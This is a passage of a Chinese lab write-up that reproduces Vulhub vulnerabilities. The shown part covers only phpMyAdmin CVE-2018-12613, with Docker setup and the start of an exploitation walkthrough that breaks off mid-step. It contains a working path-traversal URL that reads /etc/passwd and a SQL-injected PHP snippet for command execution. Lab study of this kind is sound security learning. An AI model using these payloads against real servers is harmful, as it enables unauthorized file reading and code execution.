Vulhub 漏洞复现系列(一):未授权访问与远程命令执行漏洞(phpmyadmin,thinkphp,wordpress)

目录

一.phpmyadmin(CVE-2018-12613)

1.搭建环境

2.漏洞复现

3.攻击原理

二.thinkphp(2-RCE)

1.搭建环境

2.漏洞复现

3.攻击原理

三.wordpress(pwnscriptum)

1.搭建环境

2.漏洞复现

3.攻击原理


一.phpmyadmin(CVE-2018-12613)

漏洞背景:phpmyadmin是一个用php写的,管理MySQL数据库的Web页面工具,它使用广泛,是很多建站平台的数据库管理后台,但在某些版本中target参数对路径拼接不严,可以造成本地文件包含漏洞,读取敏感文件,从而进一步控制系统

1.搭建环境

step1:进入到对应漏洞的目录之后,启动环境

sudo docker-compose up -d 

ERROR:说明Docker 客户端尝试从 Docker Hub 拉取镜像(mysql:5.5)时超时了,原因通常是网络连接问题。

解决:

1)编辑/etc/docker/daemon.json,添加镜像加速地址

sudo mkdir -p /etc/docker    
vi /etc/docker/daemon.json
{
  "registry-mirrors": [
        "https://docker.sunzishaokao.com",
        "https://docker.1ms.run",
        "https://docker.1panel.live",
        "https://docker.anyhub.us.kg"
  ]
}

2)进行加载并重启docker

systemctl daemon-reload 
systemctl restart docker   

3)尝试:解决

step2:访问http://your-ip:8080

使用ifconfig查询本机的ip地址(eth0),然后访问上述网站进入漏洞环境

step3:结束后不要忘了关闭环境

docker-compose down

2.漏洞复现

目标一:读取/etc/passwd

http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../etc/passwd

成功读取目标文件

目标二:get shell,拿到执行权限

step1:在SQL查询页面上执行以下命令

select '<?php echo `ls` ?>';

然后在inspect的storage里找到cookie值

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

你好我是小美

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值